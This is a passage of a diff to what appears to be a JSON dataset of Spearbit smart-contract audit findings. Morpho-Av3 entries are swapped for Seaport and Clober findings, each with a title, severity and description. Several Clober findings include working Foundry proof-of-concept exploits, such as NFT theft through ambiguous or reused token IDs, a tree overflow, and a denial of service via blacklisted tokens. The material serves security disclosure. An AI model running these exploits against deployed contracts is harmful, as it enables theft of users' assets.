But in general, this strategy can be implemented by anyone.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "In _authorizeLiquidate, when healthFactor is equal to Constants.DEFAULT_LIQUIDATION_THRESHOLD Morpho is wrongly setting close factor to DEFAULT_CLOSE_FACTOR", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When the borrower's healthFactor is equal to Constants.MIN_LIQUIDATION_THRESHOLD, Morpho returns the wrong value for the closeFactor, allowing only 50% of the collateral to be liquidated instead of the whole amount. When the healthFactor is lower than or equal to Constants.MIN_LIQUIDATION_THRESHOLD, Morpho should return Constants.MAX_CLOSE_FACTOR, following the same logic applied by Aave. Note that the user cannot be liquidated, even if healthFactor == MIN_LIQUIDATION_THRESHOLD, if the priceOracleSentinel is set and IPriceOracleSentinel(params.priceOracleSentinel).isLiquidationAllowed() == false. See how Aave performs the check inside validateLiquidationCall.", + "title": "Advanced orders of CONTRACT order types can generate orders with more offer items and the extra offer items might not end up being used.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CONTRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide extra offer items for this order. These extra offer items might not have been known beforehand by the caller. If the caller does not incorporate the indexes for the extra items in the fulfillment aggregation data, the extra items would end up not being aggregated into any executions.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "_authorizeBorrow does not check if the Aave price oracle sentinel allows the borrowing operation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Inside the Aave validation logic for the borrow operation, there's an additional check that prevents the user from performing the operation if it has not been allowed inside the priceOracleSentinel require( params.priceOracleSentinel == address(0) || IPriceOracleSentinel(params.priceOracleSentinel).isBorrowAllowed(), Errors.PRICE_ORACLE_SENTINEL_CHECK_FAILED ); Morpho should implement the same check. If for any reason the borrow operation has been disabled on Aave, it should also be disabled on Morpho itself. While the transaction would fail in case Morpho's user would need to perform the borrow on the pool, there could be cases where the user is completely matched in P2P. In those cases, the user would have performed a borrow even if the borrow operation was not allowed on the underlying Aave pool.", + "title": "Typo for the index check comment in _aggregateValidFulfillmentConsiderationItems", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "There is a typo in _aggregateValidFulfillmentConsiderationItems: // Retrieve item index using an offset of the fulfillment pointer.
let itemIndex := mload( add(mload(fulfillmentHeadPtr), Fulfillment_itemIndex_offset) ) // Ensure that the order index is not out of range. <---------- the line with typo if iszero(lt(itemIndex, mload(considerationArrPtr))) { throwInvalidFulfillmentComponentData() } The itemIndex above refers to the index in the consideration array and not the order.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Medium Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "_updateInDS does not \"bubble up\" the updated values of onPool and inP2P", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The _updateInDS function takes as input uint256 onPool and uint256 inP2P, which are passed not by reference but as pure values. function _updateInDS( address poolToken, address user, LogarithmicBuckets.Buckets storage poolBuckets, LogarithmicBuckets.Buckets storage p2pBuckets, uint256 onPool, uint256 inP2P, bool demoting ) internal { if (onPool <= Constants.DUST_THRESHOLD) onPool = 0; if (inP2P <= Constants.DUST_THRESHOLD) inP2P = 0; // ... other logic of the function } Those values, if lower than or equal to Constants.DUST_THRESHOLD, will be set to 0. The issue is that the updated version of onPool and inP2P is never bubbled up to the original caller, which will later use those values that could have been changed by the _updateInDS logic. For example, the _updateBorrowerInDS function calls _updateInDS and relies on the values of onPool and inP2P to understand if the user should be removed from or added to the list of borrowers. function _updateBorrowerInDS(address underlying, address user, uint256 onPool, uint256 inP2P, bool demoting) internal { _updateInDS( _market[underlying].variableDebtToken, user, _marketBalances[underlying].poolBorrowers, _marketBalances[underlying].p2pBorrowers, onPool, inP2P, demoting ); if (onPool == 0 && inP2P == 0) _userBorrows[user].remove(underlying); else _userBorrows[user].add(underlying); } Let's assume that the inP2P and onPool passed as _updateBorrowerInDS inputs were equal to 1 (the value of DUST_THRESHOLD). In this case, _updateInDS would update those values to zero, because 1 <= DUST_THRESHOLD, and would remove the user from both the poolBucket and p2pBuckets of the underlying. When the function then returns in the _updateBorrowerInDS context, the underlying would not be removed from the user's _userBorrows list of assets, because the updated values of onPool and inP2P have not been bubbled up by the _updateInDS function. The same conclusion can be drawn for all the \"root\"-level code paths that rely on onPool and inP2P values that may not have been updated with the new 0 value set by _updateInDS.", + "title": "Document the unused parameters for orders of CONTRACT order type", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "If an advanced order advancedOrder is of CONTRACT order type, certain parameters are not being used in the code base, specifically: numerator: only used for skipping certain operations (see AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT order type) denominator: -- signature: -- parameters.zone: only used when emitting the OrderFulfilled event. parameters.offer.endAmount: endAmount and startAmount for offer items will be set to the amount sent back by generateOrder for the corresponding item.
parameters.consideration.endAmount: endAmount and startAmount for consideration items will be set to the amount sent back by generateOrder for the corresponding item parameters.consideration.recipient: the offerer contract returns new recipients when generateOrder gets called parameters.zoneHash: -- parameters.salt: -- parameters.totalOriginalConsiderationItems: --", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "There is no guarantee that the _rewardsManager is set when calling claimRewards", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "Since the _rewardsManager address is set using a setter function in Morpho only, and not in the MorphoStorage.sol constructor, there is no guarantee that the _rewardsManager is not the default address(0) value. This could cause failures when calling claimRewards if Morpho forgets to set the _rewardsManager.", + "title": "The check against totalOriginalConsiderationItems is skipped for orders of CONTRACT order type", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "AdvancedOrder.parameters.totalOriginalConsiderationItems is compared with AdvancedOrder.parameters.consideration.length; the following inequality check is skipped for orders of CONTRACT order type: // Ensure supplied consideration array length is not less than the original. if (suppliedConsiderationItemTotal < originalConsiderationItemTotal) { _revertMissingOriginalConsiderationItems(); }", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "It is impossible to set _isClaimRewardsPaused", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The claimRewards function checks the isClaimRewardsPaused boolean value and reverts if it is true. Currently, there is no setter function in the code base that sets the _isClaimRewardsPaused boolean, so it is impossible to change.", + "title": "getOrderStatus returns the default values for orderHash that is derived for orders of CONTRACT order type", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Since the _orderStatus[orderHash] does not get set for orders of CONTRACT order type, getOrderStatus would always return (false, false, 0, 0) for those hashes (unless there is a hash collision with other types of orders)", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "User rewards can be claimed to treasury by DAO", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "When a user claims rewards, the rewards for the entire Morpho contract position on Aave are claimed. The excess rewards remain in the Morpho contract until all users have claimed their rewards. These rewards are not tracked and can be withdrawn by the DAO through a claimToTreasury call.", + "title": "validate skips CONTRACT order types but cancel does not", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When validating orders, validate skips any order of CONTRACT order type, but cancel does not skip these order types.
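For illustration only, a guard of the following shape inside cancel's loop would mirror validate's behavior (OrderType.CONTRACT is Seaport's enum member; the placement is an assumption, not Seaport's actual patch):

// Skip CONTRACT orders in cancel, mirroring validate: _orderStatus is never
// read for them, so setting isCancelled would only waste gas as a no-op.
if (order.parameters.orderType == OrderType.CONTRACT) {
    continue;
}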
When fulfilling or matching orders of CONTRACT order type, _orderStatus does not get checked or populated. But in cancel, the isValidated and isCancelled fields get set. This is basically a no-op for these order types.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "decreaseDelta lib function should return early if amount == 0", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The passed-in amount should be checked for a zero value and, in that condition, the function should return early. As currently written, it unnecessarily consumes more gas and emits change events for values that don't end up changing (newScaledDelta). Checking for amount == 0 is already being done in the increaseDelta function.", + "title": "The literal 0x1c used as the starting offset of a custom error in a revert statement can be replaced by the named constant Error_selector_offset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the context above, 0x1c is used to signal the start of a custom error block saved in the memory: revert(0x1c, _LENGTH_) For the above literal, we also have a named constant defined in ConsiderationConstants.sol#L410: uint256 constant Error_selector_offset = 0x1c; The named constant Error_selector_offset has been used in most places where a custom error is reverted in an assembly block.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "Smaller gas optimizations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "There are several small expressions that can be further gas optimized.", + "title": "OrderBook Denial of Service leveraging blacklistable tokens like USDC", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The issue was spotted while analysing additional impact and a fix for issue 67. Proof of concept checked with the original audit commit: 28062f477f571b38fe4f8455170bd11094a71862 and the newest available commit from the dev branch: 2ed4370b5de9cec5c455f5485358db194f093b01 Due to the architectural decision to implement the orders queue as a cyclic buffer, the OrderBook, after reaching MAX_ORDERS (~32k) for a given price point, starts to overwrite stale orders. If an order was never claimed, or is broken so that it cannot be claimed, it is not possible to place a new order in the queue. This emerges from the fact that it is not possible to finalize the stale order and deliver the underlying assets, which is done when a new order is placed and replaces a stale one. Effectively this issue can be used to block the main functionality of the OrderBook, i.e. placing new orders for a given price point. A single broken order per price point is enough to lead to this condition. The issue will not be immediately visible, as it requires the cyclic buffer to make a full circle and encounter the broken order. The proof of concept in the SecurityAuditTests.sol attachment implements a simple scenario where a USDC-like mock token is used: 1. Mallory creates one ASK order at some price point (to sell X base tokens for Y quoteTokens). 2. Mallory transfers ownership of the OrderNFT token to an address which is blacklisted by quoteToken (e.g. USDC) 3.
The orders queue, implemented as a circular buffer, over time wraps around and starts replacing old orders. 4. When it is time to replace the order, the quoteToken is about to be transferred, but due to the blacklist the assets cannot be delivered. 5. At this point it is impossible to place new orders at this price index, unless the owner of the OrderNFT transfers it to somebody who can receive quoteToken. Proof of concept result for the newest 2ed4370b5de9cec5c455f5485358db194f093b01 commit: # $ git clone ... && git checkout 2ed4370b5de9cec5c455f5485358db194f093b01 # $ forge test -m \"test_security_BlockOrderQueueWithBlacklistableToken\" [25766] MockOrderBook::limitOrder(0x0000000000000000000000000000000000004444, 3, 0, 333333333333333334, 2, 0x) [8128] OrderNFT::onBurn(false, 3, 0) [1448] MockOrderBook::getOrder((false, 3, 0)) [staticcall] (1, 0, 0x00000000000000000000000000000000DeaDBeef) emit Approval(owner: 0x00000000000000000000000000000000DeaDBeef, approved: 0x0000000000000000000000000000000000000000, tokenId: 20705239040371691362304267586831076357353326916511159665487572671397888) emit Transfer(from: 0x00000000000000000000000000000000DeaDBeef, to: 0x0000000000000000000000000000000000000000, tokenId: 20705239040371691362304267586831076357353326916511159665487572671397888) () emit ClaimOrder(claimer: 0x0000000000000000000000000000000000004444, user: 0x00000000000000000000000000000000DeaDBeef, rawAmount: 1, bountyAmount: 0, orderIndex: 0, priceIndex: 3, isBase: false) [714] MockSimpleBlockableToken::transfer(0x00000000000000000000000000000000DeaDBeef, 10000) \"blocked\" In real life all *-USDC and USDC-* pairs, as well as other pairs where a single token implements a block list, are affected. The issue is also appealing to the attacker: since the attacker controls the blacklisted wallet address, he/she can at any time transfer the unclaimable OrderNFT to a whitelisted address to claim his/her assets and re-enable processing until the next broken order is placed in the cyclic buffer. It can be used either to manipulate the market by blocking certain types of orders for given price points, or simply to blackmail the DAO in exchange for resuming operations.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Gas Optimization" + "Clober", + "Severity: Critical Risk" ] }, { - "title": "Gas: Optimize LogarithmicBuckets.getMatch", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The getMatch function of the logarithmic bucket first checks for a bucket that is the next higher bucket than the bucket the provided value would be in. If no higher bucket is found, it searches for a bucket that is the highest bucket that \"is in both bucketsMask and lowerMask.\" However, we already know that any bucket we can now find will be in lowerMask, as lowerMask is the mask corresponding to all buckets less than or equal to value's bucket. Instead, we can just directly look for the highest bucket in bucketsMask.", + "title": "Overflow in SegmentedSegmentTree464", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "SegmentedSegmentTree464.update needs to perform an overflow check in case the new value is greater than the old value. This overflow check is done when adding the new difference to each node in each layer (using addClean). Furthermore, there's a final overflow check by adding up all nodes in the first layer in total(core).
However, in total, the nodes in individual groups are added using DirtyUint64.sumPackedUnsafe: function total(Core storage core) internal view returns (uint64) { return DirtyUint64.sumPackedUnsafe(core.layers[0][0], 0, _C) + DirtyUint64.sumPackedUnsafe(core.layers[0][1], 0, _C); } The nodes in a group can overflow without triggering an overflow & revert. The impact is that the order book depth and claim functionalities break for all users. // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import \"forge-std/Test.sol\"; import \"forge-std/StdJson.sol\"; import \"../../contracts/mocks/SegmentedSegmentTree464Wrapper.sol\"; contract SegmentedSegmentTree464Test is Test { using stdJson for string; uint32 private constant _MAX_ORDER = 2**15; SegmentedSegmentTree464Wrapper testWrapper; function setUp() public { testWrapper = new SegmentedSegmentTree464Wrapper(); } function testTotalOverflow() public { uint64 half64 = type(uint64).max / 2 + 1; testWrapper.update(0, half64); // map to the right node of layer 0, group 0 testWrapper.update(_MAX_ORDER / 2 - 1, half64); assertEq(testWrapper.total(), 0); } }", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Gas Optimization" + "Clober", + "Severity: Critical Risk" ] }, { - "title": "Consider reverting the supplyCollateralLogic execution when amount.rayDivDown(poolSupplyIndex) is equal to zero", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "In Aave, when an AToken/VariableDebtToken is minted or burned, the transaction will revert if the amount divided by the index is equal to zero. You can see the check in the implementation of the _mintScaled and _burnScaled functions in the Aave codebase. Morpho, with PR 688, has decided to prevent supply to the pool in this scenario to avoid a revert of the operation. Before the PR, if the user had supplied an amount for which amount.rayDivDown(poolSupplyIndex) would be equal to zero, the operation would have reverted at the Aave level during the mint operation of the AToken. With the PR, the operation will proceed because the supply to the Aave pool is skipped (see PoolLib.supplyToPool). Allowing this scenario in this specific context for the supplyCollateralLogic function will bring the following side effects: The supplied user's amount will remain in Morpho's contract and will not be supplied to the Aave pool. The user's accounting system is not updated because collateralBalance is increased by amount.rayDivDown(poolSupplyIndex), which is equal to zero. If the marketBalances.collateral[onBehalf] was equal to zero (the user has never supplied the underlying to Morpho), the underlying token would be wrongly added to the _userCollaterals[onBehalf] storage, even if the amount supplied to Morpho (and to Aave) is equal to zero. The user will not be able to withdraw the provided amount because the amount has not been accounted for in the storage. The Events.CollateralSupplied event is emitted even if the amount (used as an event parameter) has not been accounted to the user.", + "title": "OrderNFT theft due to controlling future and past tokens of same order index", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The order queue is implemented as a ring buffer; to get an order (Orderbook.getOrder), the index in the queue is computed as orderIndex % _MAX_ORDER. The owner of an OrderNFT also uses this function.
function _getOrder(OrderKey calldata orderKey) internal view returns (Order storage) { return _getQueue(orderKey.isBid, orderKey.priceIndex).orders[orderKey.orderIndex & _MAX_ORDER_M]; } CloberOrderBook(market).getOrder(decodeId(tokenId)).owner Therefore, the current owner of the NFT of orderIndex also owns all NFTs with orderIndex + k * _MAX_ORDER. An attacker can set approvals of future token IDs to themself. These approvals are not cleared on OrderNFT.onMint when a victim mints this future token ID, allowing the attacker to steal the NFT and cancel the NFT to claim their tokens. // SPDX-License-Identifier: BUSL-1.1 pragma solidity ^0.8.0; import \"forge-std/Test.sol\"; import \"../../../../contracts/interfaces/CloberMarketSwapCallbackReceiver.sol\"; import \"../../../../contracts/mocks/MockQuoteToken.sol\"; import \"../../../../contracts/mocks/MockBaseToken.sol\"; import \"../../../../contracts/mocks/MockOrderBook.sol\"; import \"../../../../contracts/markets/VolatileMarket.sol\"; import \"../../../../contracts/OrderNFT.sol\"; import \"../utils/MockingFactoryTest.sol\"; import \"./Constants.sol\"; contract ExploitsTest is Test, CloberMarketSwapCallbackReceiver, MockingFactoryTest { struct Return { address tokenIn; address tokenOut; uint256 amountIn; uint256 amountOut; uint256 refundBounty; } struct Vars { uint256 inputAmount; uint256 outputAmount; uint256 beforePayerQuoteBalance; uint256 beforePayerBaseBalance; uint256 beforeTakerQuoteBalance; uint256 beforeOrderBookEthBalance; } MockQuoteToken quoteToken; MockBaseToken baseToken; MockOrderBook orderBook; OrderNFT orderToken; function setUp() public { quoteToken = new MockQuoteToken(); baseToken = new MockBaseToken(); } function cloberMarketSwapCallback( address tokenIn, address tokenOut, uint256 amountIn, uint256 amountOut, bytes calldata data ) external payable { if (data.length != 0) { Return memory expectedReturn = abi.decode(data, (Return)); assertEq(tokenIn, expectedReturn.tokenIn, \"ERROR_TOKEN_IN\"); assertEq(tokenOut, expectedReturn.tokenOut, \"ERROR_TOKEN_OUT\"); assertEq(amountIn, expectedReturn.amountIn, \"ERROR_AMOUNT_IN\"); assertEq(amountOut, expectedReturn.amountOut, \"ERROR_AMOUNT_OUT\"); assertEq(msg.value, expectedReturn.refundBounty, \"ERROR_REFUND_BOUNTY\"); } IERC20(tokenIn).transfer(msg.sender, amountIn); } function _createOrderBook(int24 makerFee, uint24 takerFee) private { orderToken = new OrderNFT(); orderBook = new MockOrderBook( address(orderToken), address(quoteToken), address(baseToken), 1, 10**4, makerFee, takerFee, address(this) ); orderToken.init(\"\", \"\", address(orderBook), address(this)); uint256 _quotePrecision = 10**quoteToken.decimals(); quoteToken.mint(address(this), 1000000000 * _quotePrecision); quoteToken.approve(address(orderBook), type(uint256).max); uint256 _basePrecision = 10**baseToken.decimals(); baseToken.mint(address(this), 1000000000 * _basePrecision); baseToken.approve(address(orderBook), type(uint256).max); } function _buildLimitOrderOptions(bool isBid, bool postOnly) private pure returns (uint8) { return (isBid ? 1 : 0) + (postOnly ? 2 : 0); } uint256 private constant _MAX_ORDER = 2**15; // 32768 uint256 private constant _MAX_ORDER_M = 2**15 - 1; // % 32768 function testExploit2() public { _createOrderBook(0, 0); address attacker = address(0x1337); address attacker2 = address(0x1338); address victim = address(0xbabe); // Step 1.
Attacker creates an ASK limit order and receives NFT uint16 priceIndex = 100; uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: attacker, priceIndex: priceIndex, rawAmount: 0, baseAmount: 1e18, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ambiguous tokenIds CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex}); uint256 currentTokenId = orderToken.encodeId(orderKey); orderKey.orderIndex += _MAX_ORDER; uint256 futureTokenId = orderToken.encodeId(orderKey); // Step 3. Attacker approves the futureTokenId to themself, and cancels the current id vm.startPrank(attacker); orderToken.approve(attacker2, futureTokenId); CloberOrderBook.OrderKey[] memory orderKeys = new CloberOrderBook.OrderKey[](1); orderKeys[0] = orderKey; orderKeys[0].orderIndex = orderIndex; // restore original orderIndex orderBook.cancel(attacker, orderKeys); vm.stopPrank(); // Step 4. Attacker fills the queue, victim creates their order and recycles orderIndex 0 uint256 victimOrderSize = 1e18; for(uint256 i = 0; i < _MAX_ORDER; i++) { orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: i < _MAX_ORDER - 1 ? attacker : victim, priceIndex: priceIndex, rawAmount: 0, baseAmount: victimOrderSize, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); } assertEq(orderToken.ownerOf(futureTokenId), victim); // Step 5. Attacker steals the NFT and can cancel to receive the tokens vm.startPrank(attacker2); orderToken.transferFrom(victim, attacker, futureTokenId); vm.stopPrank(); assertEq(orderToken.ownerOf(futureTokenId), attacker); uint256 baseBalanceBefore = baseToken.balanceOf(attacker); vm.startPrank(attacker); orderKeys[0].orderIndex = orderIndex + _MAX_ORDER; orderBook.cancel(attacker, orderKeys); vm.stopPrank(); assertEq(baseToken.balanceOf(attacker) - baseBalanceBefore, victimOrderSize); } }", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Critical Risk" ] }, { - "title": "WETHGateway does not validate the constructor's input parameters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The current implementation of the WETHGateway contract does not validate the user's parameters in the constructor. In this specific case, the constructor should revert if the morpho address is equal to address(0).", + "title": "OrderNFT theft due to ambiguous tokenId encoding/decoding scheme", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The encodeId() uniquely encodes an OrderKey to a uint256 number. However, decodeId() can ambiguously decode many tokenIds to the exact same OrderKey. This can be problematic due to the fact that the contract uses tokenIds to store approvals. The ambiguity comes from converting the uint8 value to the bool isBid value here: function decodeId(uint256 id) public pure returns (CloberOrderBook.OrderKey memory) { uint8 isBid; uint16 priceIndex; uint232 orderIndex; assembly { orderIndex := id priceIndex := shr(232, id) isBid := shr(248, id) } return CloberOrderBook.OrderKey({isBid: isBid == 1, priceIndex: priceIndex, orderIndex: orderIndex});
} (note that the attack is possible only for ASK limit orders) Proof of Concept // Step 1. Attacker creates an ASK limit order and receives NFT uint16 priceIndex = 100; uint256 orderIndex = orderBook.limitOrder{value: Constants.CLAIM_BOUNTY * 1 gwei}({ user: attacker, priceIndex: priceIndex, rawAmount: 0, baseAmount: 10**18, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ambiguous tokenIds CloberOrderBook.OrderKey memory order_key = CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex}); uint256 tokenId = orderToken.encodeId(order_key); uint256 ambiguous_tokenId = tokenId + (1 << 255); // crafting ambiguous tokenId // Step 3. Attacker approves both victim (can be a third-party protocol like OpenSea) and his other account vm.startPrank(attacker); orderToken.approve(victim, tokenId); orderToken.approve(attacker2, ambiguous_tokenId); vm.stopPrank(); // Step 4. Victim transfers the NFT to themselves. (Or attacker trades it) vm.startPrank(victim); orderToken.transferFrom(attacker, victim, tokenId); vm.stopPrank(); // Step 5. Attacker steals the NFT vm.startPrank(attacker2); orderToken.transferFrom(victim, attacker2, ambiguous_tokenId); vm.stopPrank();", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: Critical Risk" ] }, { - "title": "Missing/wrong natspec, typos, minor refactors and renaming of variables to be more meaningful", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "In general, the current codebase does not cover all the functions, events, structs, or state variables with proper natspec. Below you can find a list of small specific improvements regarding typos, missing/wrong natspec, or suggestions to rename variables to a more meaningful/correct name: RewardsManager.sol#L28: consider renaming the balance variable in UserAssetBalance to scaledBalance PositionsManagerInternal.sol#L289-L297, PositionsManagerInternal.sol#L352-L362: consider better documenting this part of the code, because at first sight it's not crystal clear why the code is structured in this way. For more context, see the PR comment in the spearbit audit repo linked to it. MorphoInternal.sol#L469-L521: consider moving the _calculateAmountToSeize function from MorphoInternal to the PositionsManagerInternal contract. This function is only used internally by the PositionsManagerInternal. Note that there could be more instances of these kinds of \"refactoring\" of the code inside other contracts.", + "title": "Missing owner check on from when transferring tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The OrderNFT.transferFrom/safeTransferFrom use the internal _transfer function. While they check approvals on msg.sender through _isApprovedOrOwner(msg.sender, tokenId), it is never checked that the specified from parameter is actually the owner of the NFT. An attacker can decrease other users' NFT balances, making them unable to cancel or claim their NFTs and locking users' funds. The attacker transfers their own NFT passing the victim as from by calling transferFrom(from=victim, to=attackerAccount, tokenId=attackerTokenId).
This passes the _isApprovedOrOwner check, but reduces from's balance.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: High Risk" ] }, { - "title": "No validation checks on the newDefaultIterations struct", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The initialize function takes in a newDefaultIterations struct and does not perform validation for any of its fields.", + "title": "Wrong minimum net fee check", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "A minimum net fee was introduced that all markets should comply with, so that the protocol earns fees. The protocol fee is computed as takerFee + makerFee, and the market factory implements the check incorrectly. Fee pairs that should be accepted are currently not accepted and, even worse, fee pairs that should be rejected are currently accepted. Market creators can avoid collecting protocol fees this way.", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: High Risk" ] }, { - "title": "No validation check for newPositionsManager address", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The initialize function does not ensure that the newPositionsManager is not a 0 address.", + "title": "Rounding up of taker fees of constituent orders may exceed collected fee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "If multiple orders are taken, the taker fee calculated is rounded up once, but that of each taken maker order could be rounded up as well, leading to more fees accounted for than actually taken. Example: takerFee = 100011 (10.0011%) 2 maker orders of amounts 400000 and 377000 total amount = 400000 + 377000 = 777000 Taker fee taken = 777000 * 100011 / 1000000 = 77708.547, rounded up to 77709 Maker fees would be 377000 * 100011 / 1000000 = 37704.147, rounded up to 37705 400000 * 100011 / 1000000 = 40004.4, rounded up to 40005 which sums to 77710, i.e. 1 wei more than actually taken.
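The mismatch is just the rounding identity ceil(a) + ceil(b) >= ceil(a + b); a standalone sketch (hypothetical divCeil helper, not Clober's code) reproduces the numbers above:

function divCeil(uint256 a, uint256 b) pure returns (uint256) {
    return (a + b - 1) / b; // round up
}
// taker pays:  divCeil(777000 * 100011, 1000000)                 = 77709
// accounted:   divCeil(400000 * 100011, 1000000)
//            + divCeil(377000 * 100011, 1000000) = 40005 + 37705 = 77710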
Below is a foundry test to reproduce the problem, which can be inserted into Claim.t.sol: function testClaimFeesFailFromRounding() public { _createOrderBook(0, 100011); // 10.0011% taker fee // create 2 orders uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); uint256 orderIndex2 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); // take both orders _createTakeOrder(Constants.BID, 2 * Constants.RAW_AMOUNT); CloberOrderBook.OrderKey[] memory ids = new CloberOrderBook.OrderKey[](2); ids[0] = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex1 }); ids[1] = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex2 }); // perform claim orderBook.claim( address(this), ids ); // (uint128 quoteFeeBal, uint128 baseFeeBal) = orderBook.getFeeBalance(); // console.log(quoteFeeBal); // fee accounted = 20004 // console.log(baseFeeBal); // fee accounted = 0 // console.log(quoteToken.balanceOf(address(orderBook))); // actual fee collected = 20003 // try to claim fees, will revert vm.expectRevert(\"ERC20: transfer amount exceeds balance\"); orderBook.collectFees(); }", "labels": [ "Spearbit", - "Morpho-Av3", - "Severity: Informational" + "Clober", + "Severity: High Risk" ] }, { - "title": "Missing Natspec function documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Morpho-Av3-Spearbit-Security-Review.pdf", - "body": "The repayLogic function currently has Natspec documentation for every function argument except for the repayer argument.", + "title": "Drain tokens condition due to reentrancy in collectFees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", + "body": "The collectFees function is not guarded by a reentrancy guard. In case a transfer of at least one of the tokens in a trading pair can invoke arbitrary code (e.g. a token implementing callbacks/hooks), it is possible for a malicious host to drain trading pools. The reentrancy condition allows collected fees to be transferred multiple times, to both the DAO and the host, beyond the actual fee counter.", "labels": [ "Spearbit", - 